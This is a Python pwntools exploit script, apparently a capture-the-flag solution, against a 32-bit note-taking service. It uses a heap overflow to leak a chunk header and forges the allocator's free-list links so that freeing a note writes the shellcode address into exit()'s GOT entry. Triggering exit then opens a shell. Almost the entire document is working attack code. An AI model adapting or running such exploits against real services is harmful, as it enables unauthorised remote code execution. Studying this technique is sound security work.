from pwn import *

context(arch='i386', os='linux', log_level="info")

# Target: "./path" runs a local process, anything else is host:PORT.
HOST = args.get('HOST', "localhost")
PORT = 4000

# GOT slot of exit() in the target binary (value taken from the original).
got_exit = 0x804A010

# Shellcode layout: a 2-byte short jump, 12 bytes of filler, then the payload.
# A later header overwrite (next/prev pointers) may land inside the filler,
# so execution hops over that region instead of running through it.
_sc_parts = [
    asm("jmp $+14"),        # skip the 12 filler bytes
    "A" * 12,
    asm(shellcraft.sh()),
]
sc = "".join(_sc_parts)
log.debug(disasm(sc))

# Chunk header as it appears in a leaked note: (size, next, prev), little-endian.
f_hchunk = "<III"
def create_note(size):
    """Menu option 1: allocate a new note of *size* bytes.

    Talks over the module-level tube ``r`` and blocks until the menu prompt
    is printed again.
    """
    for line in ("1", "%d" % size):
        r.sendline(line)
    r.recvuntil("option.\n")
def modify_note(id, size, content):
    """Menu option 3: rewrite note *id*, announcing *size* bytes of data.

    *size* is whatever the caller claims; the service is not told the real
    length of *content*, which is sent verbatim as one line.  Uses the
    module-level tube ``r`` and waits for the menu prompt afterwards.
    """
    for line in ("3", "%d" % id, "%d" % size):
        r.sendline(line)
    r.recvuntil("your data.")
    r.sendline("%s" % content)
    r.recvuntil("option.")
def print_note(id):
    """Menu option 4: ask the service to print note *id*.

    Returns the raw reply up to the next menu prompt, unparsed; the caller
    reads whatever lies past the note's data (the neighbouring chunk header)
    out of this buffer.
    """
    r.sendline("4")
    r.recvuntil("id.\n")
    r.sendline("%d" % id)
    reply = r.recvuntil("option.")
    return reply
def remove_note(id):
    """Menu option 2: free note *id* and wait for the menu prompt."""
    for line in ("2", "%d" % id):
        r.sendline(line)
    r.recvuntil("option.\n")
with process(HOST) if HOST.startswith("./") \
        else remote(HOST, PORT, timeout=0.5) as r:
    # Two adjacent notes: note 0 carries the payload, note 1 is the victim
    # whose chunk header follows note 0's data.
    create_note(len(sc))  # note 0
    create_note(16)       # note 1

    # Round the payload up to the allocator's 12-byte granularity plus one
    # header, then work out how much filler separates the shellcode from
    # note 1's header.  (The rounding rule mirrors the original formula;
    # confirm it against the target allocator if the leak looks off.)
    sc_len = len(sc)
    alloc_size = (sc_len + 12) // 12 * 12 + 12
    pad_size = alloc_size - sc_len - 12
    pad = "A" * pad_size

    # First write: claim 100 bytes (more than was allocated) and run three
    # bytes past the buffer into note 1's size field; the trailing newline
    # supplies the fourth byte.
    modify_note(0, 100, flat(sc, pad, "AAA"))

    # Printing note 0 now returns the filler and note 1's header as well,
    # which yields that chunk's (size, next, prev).
    leaked = print_note(0)
    hdr_off = sc_len + pad_size
    chunk_size, nxt, prv = struct.unpack_from(f_hchunk, leaked, hdr_off)
    log.info(
        "leak chunk for note 1: (%s, %s, %s)"
        % (hex(chunk_size), hex(nxt), hex(prv))
    )
    # prev points at the previous chunk; its data (the shellcode) starts one
    # 12-byte header later.
    sc_addr = prv + 12

    # Second write: same payload, this time also replacing note 1's links.
    modify_note(0, 100, flat(
        sc, pad, "AAAA",
        p32(got_exit),  # next
        p32(sc_addr),   # prev
    ))

    # Freeing note 1 unlinks it from the list; with forged links the unlink
    # stores the shellcode address into the GOT slot.  NOTE(review): this
    # depends on free() not validating the list links before unlinking —
    # presumably a custom allocator without a safe-unlink check; confirm.
    remove_note(1)

    # Menu option 6 (exit) then dispatches through the rewritten GOT entry.
    r.send("6\n")
    r.interactive()